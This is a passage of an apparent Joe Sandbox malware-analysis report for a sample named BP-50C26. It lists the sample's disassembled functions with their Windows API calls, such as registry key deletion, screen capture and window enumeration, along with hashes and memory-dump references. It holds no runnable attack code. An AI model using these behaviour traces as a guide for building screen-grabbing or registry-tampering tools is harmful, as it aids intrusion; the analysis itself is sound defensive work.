                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9B6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9B772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00C9B80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9B87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9B89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C9B8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9B904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9B922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C9B983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9B994
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 146587525-4033151799
                                                                                      • Opcode ID: 091b5d0a15e1cc0632a96e78994420caf67e8dc0e2c57b7a18ee20ac68fe556e
                                                                                      • Instruction ID: 7dbafb7a622aa88fc536aa8fcf835baf4d861a4881fcad9d2c8b205f85bc94fd
                                                                                      • Opcode Fuzzy Hash: 091b5d0a15e1cc0632a96e78994420caf67e8dc0e2c57b7a18ee20ac68fe556e
                                                                                      • Instruction Fuzzy Hash: E5C19E30204201AFDB10DF14D598F2ABBE5FF85308F15859CF5AA4B2A2CB71ED86DB91
                                                                                      Function 00C9255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00C925D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C925E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00C925F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00C92601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C9266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C926AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C926D0
                                                                                      • SelectObject.GDI32(?,?), ref: 00C926D8
                                                                                      • DeleteObject.GDI32(?), ref: 00C926E1
                                                                                      • DeleteDC.GDI32(?), ref: 00C926E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00C926F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      • API String ID: 2598888154-3887548279
                                                                                      • Opcode ID: 684fa6ab35d2170098aa0d538dd561835490fc135c141f05b0fb3a40b1bc62cd
                                                                                      • Instruction ID: 60dda1baba4a847382234595482497a9e7cb0f4389b0a6071f432e4d452fbadd
                                                                                      • Opcode Fuzzy Hash: 684fa6ab35d2170098aa0d538dd561835490fc135c141f05b0fb3a40b1bc62cd
                                                                                      • Instruction Fuzzy Hash: 6061E475E00219EFCF05CFA4D984AAEBBF5FF48314F208529E955A7250D770A941DF90
                                                                                      Function 00C4DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 00C4DAA1
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D659
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D66B
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D67D
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D68F
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6A1
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6B3
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6C5
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6D7
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6E9
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6FB
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D70D
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D71F
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D731
                                                                                      • _free.LIBCMT ref: 00C4DA96
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4DAB8
                                                                                      • _free.LIBCMT ref: 00C4DACD
                                                                                      • _free.LIBCMT ref: 00C4DAD8
                                                                                      • _free.LIBCMT ref: 00C4DAFA
                                                                                      • _free.LIBCMT ref: 00C4DB0D
                                                                                      • _free.LIBCMT ref: 00C4DB1B
                                                                                      • _free.LIBCMT ref: 00C4DB26
                                                                                      • _free.LIBCMT ref: 00C4DB5E
                                                                                      • _free.LIBCMT ref: 00C4DB65
                                                                                      • _free.LIBCMT ref: 00C4DB82
                                                                                      • _free.LIBCMT ref: 00C4DB9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: 7a586c190c7a38f96f4f0b8a1e4d92889406a6418c3f1f75c17357e2184dbbe4
                                                                                      • Instruction ID: 6a6b1dbf659a48bfbfe750638e9b256610eef0ec29d6ebe81b2caf75d9e200dc
                                                                                      • Opcode Fuzzy Hash: 7a586c190c7a38f96f4f0b8a1e4d92889406a6418c3f1f75c17357e2184dbbe4
                                                                                      • Instruction Fuzzy Hash: A23170316047059FEB22BA39E846B5A77E9FF10310F55441AF46AD7291DF31EE80E720
                                                                                      Function 00C7365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C7369C
                                                                                      • _wcslen.LIBCMT ref: 00C736A7
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C73797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C7380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 00C7385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C73882
                                                                                      • GetParent.USER32(?), ref: 00C738A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 00C738A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C73921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C7395D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 4010501982-679674701
                                                                                      • Opcode ID: 2a103b11a8bc7d30dc8ed7087b279ef002feee5150b60628c71935edf4675702
                                                                                      • Instruction ID: c8fc642e309b90861957ddb370a27d14f283ea504a7f3fbac825ab68928e8970
                                                                                      • Opcode Fuzzy Hash: 2a103b11a8bc7d30dc8ed7087b279ef002feee5150b60628c71935edf4675702
                                                                                      • Instruction Fuzzy Hash: 0091BF71204646AFD719DF24C885BAAF7A8FF44354F00C629FAADD2190DB30EB45DBA1
                                                                                      Function 00C74954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C74994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C749DA
                                                                                      • _wcslen.LIBCMT ref: 00C749EB
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C749F7
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C74A2C
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C74A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C74A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C74AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C74B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C74B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 1311036022-1241985126
                                                                                      • Opcode ID: 60d24ff43651c953b116a5d489f9fc96675b3c83395e0c31d57320a2e98f84bb
                                                                                      • Instruction ID: e6ec6619e052fbc965b7fa7ed5db851164746e3ff46e20486ff06b0be274f062
                                                                                      • Opcode Fuzzy Hash: 60d24ff43651c953b116a5d489f9fc96675b3c83395e0c31d57320a2e98f84bb
                                                                                      • Instruction Fuzzy Hash: 3791DE311042059FDB09DF14C985FAAB7E8FF84314F04C46AFD999A096EB30EE45DBA1
                                                                                      Function 00CA8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA8D5A
                                                                                      • GetFocus.USER32 ref: 00CA8D6A
                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00CA8D75
                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00CA8E1D
                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CA8ECF
                                                                                      • GetMenuItemCount.USER32(?), ref: 00CA8EEC
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00CA8EFC
                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CA8F2E
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CA8F70
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA8FA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 1026556194-4108050209
                                                                                      • Opcode ID: fc805d156a3ee18ae7b113ec75821b7dca3f19930ff05fa6ed952c282355e11b
                                                                                      • Instruction ID: 68bbc0b8dedad7e12538f47700ab01f451cb612ba018eb80804f8faed442975b
                                                                                      • Opcode Fuzzy Hash: fc805d156a3ee18ae7b113ec75821b7dca3f19930ff05fa6ed952c282355e11b
                                                                                      • Instruction Fuzzy Hash: A481B0715083029FDB20CF64DC84AABBBE9FF8A358F04091DF99597291DB70DA08DB61
                                                                                      Function 00C7DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C7DC20
                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C7DC46
                                                                                      • _wcslen.LIBCMT ref: 00C7DC50
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C7DCA0
                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C7DCBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                      • API String ID: 1939486746-1459072770
                                                                                      • Opcode ID: 71fcaa07087160e971dd579cd79570bef7699a18cd93877e2e3dce39ffb7a52d
                                                                                      • Instruction ID: 11d27227d96f38d44d04d60819b6e654f3935f8b992792ec7c207d9a34dd746d
                                                                                      • Opcode Fuzzy Hash: 71fcaa07087160e971dd579cd79570bef7699a18cd93877e2e3dce39ffb7a52d
                                                                                      • Instruction Fuzzy Hash: AB4140329002157ADB15AB64AC87FFF37BCEF56710F10407AFA05A2182EB719A01A7B4
                                                                                      Function 00C9CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C9CC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9CD48
                                                                                        • Part of subcall function 00C9CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C9CCAA
                                                                                        • Part of subcall function 00C9CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C9CCBD
                                                                                        • Part of subcall function 00C9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9CCCF
                                                                                        • Part of subcall function 00C9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9CD05
                                                                                        • Part of subcall function 00C9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9CCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: 6722d6172f1897dbd40edaefc16621697a5eaef7f66158883e1b421975253819
                                                                                      • Instruction ID: a905bf10e1819524fcdea12ec4d076c2d4db75ed44ab4519549080ccba34fb3a
                                                                                      • Opcode Fuzzy Hash: 6722d6172f1897dbd40edaefc16621697a5eaef7f66158883e1b421975253819
                                                                                      • Instruction Fuzzy Hash: 33315A72A01129BBDB208B95DCCCFFFBB7CEF46754F000165E916E3240DA349A45AAA0
                                                                                      Function 00C7E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 00C7E6B4
                                                                                        • Part of subcall function 00C2E551: timeGetTime.WINMM(?,?,00C7E6D4), ref: 00C2E555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00C7E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C7E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C7E727
                                                                                      • SetActiveWindow.USER32 ref: 00C7E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C7E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C7E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 00C7E77E
                                                                                      • IsWindow.USER32 ref: 00C7E78A
                                                                                      • EndDialog.USER32(00000000), ref: 00C7E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: 8a54efd2d907f33047ea16b0b064b2578400f35fe1fe094da5b3de1a18dec356
                                                                                      • Instruction ID: 2a3e38cae76345f5b234d2deb4d795bcd7507f94f76381b4705683ee6376d165
                                                                                      • Opcode Fuzzy Hash: 8a54efd2d907f33047ea16b0b064b2578400f35fe1fe094da5b3de1a18dec356
                                                                                      • Instruction Fuzzy Hash: D1218172200685AFEB009F64ECC9B2D3B6DF75A34DB109465F919C61B1DBB1AD10AB24
                                                                                      Function 00C7E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C7EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C7EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C7EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$_wcslen
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 2420728520-1007645807
                                                                                      • Opcode ID: 7d1b4821a7bed87c5ff4bbbcc6775545d93575b04e488d853cd70461ea6d1f3a
                                                                                      • Instruction ID: a7c514e042fcbb74b104ea568616d60112e44c5bc082ac0512481c69173079a7
                                                                                      • Opcode Fuzzy Hash: 7d1b4821a7bed87c5ff4bbbcc6775545d93575b04e488d853cd70461ea6d1f3a
                                                                                      • Instruction Fuzzy Hash: 6111A331A9026979D720E7A1DC5AEFF6B7CFBD6B10F40043AB911A21D0EE701A45E5B0
                                                                                      Function 00C75CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C75CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C75D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C75D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C75DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C75DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C75E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C75E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C75E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C75E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: 345eae9145b27f7177b5678c9ae203741df98884f4669f71539e27a0cb0fedd2
                                                                                      • Instruction ID: 7bf9606649955f02c433e94f2a2befbd22d74fcae37cf4c208012aa9e3fe7c3b
